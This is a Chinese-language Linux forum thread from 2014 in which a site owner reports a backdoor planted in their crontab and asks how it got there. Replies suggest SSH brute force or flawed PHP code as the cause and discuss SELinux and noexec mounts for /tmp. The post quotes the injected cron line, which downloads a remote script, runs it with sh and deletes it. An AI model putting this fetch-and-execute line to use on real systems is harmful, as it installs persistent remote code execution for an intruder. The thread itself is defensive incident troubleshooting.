[問題] 被植入後門

看板Linux作者 (看文不要只會用橫的看)時間11年前 (2014/10/01 11:18), 編輯推噓-1(0110)
留言11則, 4人參與, 最新討論串1/1
我的站台的crontab 被寫入 @weekly wget http://x/bots/regulat.bot -O /tmp/sh;sh /tmp/sh;rm -rf /tmp/sh > /dev/null 2&1 目前已知不影響主機,因為URL已經失效了。 PS.貼出來的URL已經處理過了,domain我改成x,以防被誤點。 但實在找不出他植入的方法,有人知道嗎? -- 小惡魔的家 http://blog.pixnet.net/shiuju/ -- -- ※ 發信站: 批踢踢實業坊(ptt.cc), 來自: 60.251.237.155 ※ 文章網址: http://www.ptt.cc/bbs/Linux/M.1412133531.A.ED1.htmlaverywu:轉錄至看板 PHP 10/01 11:19
10/01 15:43, , 1F
這個還要查看其他點會比較好知道是哪邊引起的
10/01 15:43, 1F
10/01 15:43, , 2F
常見比方帳號密碼被猜中這種暴力 ssh 登入進來的
10/01 15:43, 2F
10/01 15:44, , 3F
或者是跑的 php 程式碼有問題這類
10/01 15:44, 3F
10/01 15:45, , 4F
題外話若你是安裝 rh-based 的版本有開 selinux 的話
10/01 15:45, 4F
10/01 15:46, , 5F
通常最後會因為 policy 設定不會允許 /tmp 內檔案執行
10/01 15:46, 5F
10/01 15:47, , 6F
在 web server 環境上面的話比較能夠減少後續問題
10/01 15:47, 6F
10/01 19:59, , 7F
sh /tmp/sh不就愛幹嘛幹嘛了嗎?他從regulat.bot抓下來
10/01 19:59, 7F
10/03 00:02, , 8F
/tmp 可以用 -o noexec 防止 sh /tmp/sh
10/03 00:02, 8F
10/03 00:32, , 9F
樓上 那是shell的行為 不是所有shell都會檢查的
10/03 00:32, 9F
10/03 13:24, , 10F
noexec 比較適合於 binary 檔案,script 似乎就......
10/03 13:24, 10F
10/05 23:48, , 11F
嗯, 用 sh /tmp/xxx.sh 都不會被檔下
10/05 23:48, 11F
更多 averywu 的文章
文章代碼(AID): #1KAtARxH (Linux)